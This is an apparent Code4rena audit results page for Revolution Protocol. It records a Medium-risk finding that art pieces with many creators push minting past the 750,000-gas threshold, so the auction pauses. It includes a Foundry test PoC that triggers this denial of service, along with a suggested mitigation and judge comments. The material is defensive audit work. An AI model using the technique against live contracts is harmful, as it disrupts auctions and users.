Revolution Protocol - wintermute's results

A protocol to empower communities to raise funds, fairly distribute governance, and maximize their impact in the world.

General Information

Platform: Code4rena

Start Date: 13/12/2023

Pot Size: $36,500 USDC

Total HM: 18

Participants: 110

Period: 8 days

Judge: 0xTheC0der

Id: 311

League: ETH

Collective

Findings Distribution

Researcher Performance

Rank: 41/110

Findings: 1

Award: $148.46

🌟 Selected for report: 0

🚀 Solo Findings: 0

Findings Information

🌟 Selected for report: bart1e

Also found by: 00xSEV, 0xDING99YA, Ryonen, Tricko, hals, wintermute

Labels

bug
2 (Med Risk)
satisfactory
sufficient quality report
edited-by-warden
duplicate-195

Awards

148.462 USDC - $148.46

External Links

Lines of code

https://github.com/code-423n4/2023-12-revolutionprotocol/blob/d42cc62b873a1b2b44f57310f9d4bbfdd875e8d6/packages/revolution/src/AuctionHouse.sol#L311

Vulnerability details

Impact

A malicious actor can pause the AuctionHouse, or it can happen by accident. Admin action is needed to unpause it. This would be a bad experience for users, inconvenient for the admin, and can damage long-term protocol viability because of the need for the admin to constantly monitor the pause state.

Proof of Concept

Add this to AuctionBasic.t.sol:

```solidity
function testAuctionCreationDOS_gas() public {
    // create piece with lots of creators
    address[] memory creators = new address[](100);
    for (uint160 i; i < 100; i++) creators[i] = address(i + 1);
    uint[] memory bps = new uint[](100);
    bps[0] = 10_000;
    createArtPieceMultiCreator(
        "test",
        "test",
        ICultureIndex.MediaType.IMAGE,
        "test",
        "test",
        "test",
        creators,
        bps
    );

    // unpausing auction triggers the create new auction routine, same as settleCurrentAndCreateNewAuction
    vm.expectEmit(true, true, true, true);
    emit PausableUpgradeable.Paused(address(dao));
    address(auction).call{gas: 1_000_000}(abi.encodeWithSelector(auction.unpause.selector));
}
```

When an art piece has a lot of creators, the 750_000 gas threshold is insufficient to write all creators to Verbs storage. The mint will revert because of OOG and the pause is triggered.

This happens because writing 1 creator to storage costs ~20K gas, 20K * 100 > 750_000.

Tools Used

www.evm.codes, Manual Review

Raise the threshold or lower the max amount of creators. Another solution would be to revert if the return data of the mint call is empty, as it's (likely) because of OOG.

Assessed type

DoS
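A minimal sketch of the failure mode and of the empty-return-data mitigation described in the finding above, added here as an example and not taken from the warden's report or the protocol's code. The try/catch shape and every contract, function and constant name are assumptions; only the 750_000 threshold, the 100 creators and the ~20K gas per write come from the finding.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added sketch: every name below is hypothetical, not the protocol's code.
interface IToken {
    function mint() external returns (uint256);
}

// Stand-in token whose mint writes 100 creators to storage (~20K gas each).
contract TokenSketch is IToken {
    address[] public creators;
    uint256 public nextId;

    function mint() external returns (uint256) {
        for (uint160 i; i < 100; i++) creators.push(address(i + 1));
        return nextId++;
    }
}

contract AuctionSketch {
    uint256 constant MIN_MINT_GAS = 750_000; // threshold quoted in the finding
    IToken public immutable token;
    bool public paused;
    uint256 public tokenId;

    error MintOutOfGas();

    constructor(IToken token_) { token = token_; }

    // Assumed shape of the flawed flow: any mint failure, OOG included, pauses.
    // The caller keeps 1/64 of its gas, which may be enough to run the catch.
    function createAuctionPausing() external {
        require(gasleft() >= MIN_MINT_GAS, "insufficient gas");
        try token.mint() returns (uint256 id) { tokenId = id; }
        catch { paused = true; }
    }

    // Mitigation from the finding: empty revert data is (likely) OOG, so the
    // whole transaction reverts and can be retried with a higher gas limit.
    // A bare revert() in the callee also yields empty data, hence "likely".
    function createAuctionHardened() external {
        require(gasleft() >= MIN_MINT_GAS, "insufficient gas");
        try token.mint() returns (uint256 id) { tokenId = id; }
        catch (bytes memory reason) {
            if (reason.length == 0) revert MintOutOfGas();
            paused = true; // mint failed with an explicit error
        }
    }
}
```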

#0 - c4-pre-sort

2023-12-23T01:09:38Z

raymondfam marked the issue as sufficient quality report

#1 - c4-pre-sort

2023-12-23T01:09:56Z

raymondfam marked the issue as duplicate of #93

#2 - c4-pre-sort

2023-12-24T14:36:07Z

raymondfam marked the issue as duplicate of #195

#3 - c4-judge

2024-01-06T13:26:32Z

MarioPoneder marked the issue as satisfactory
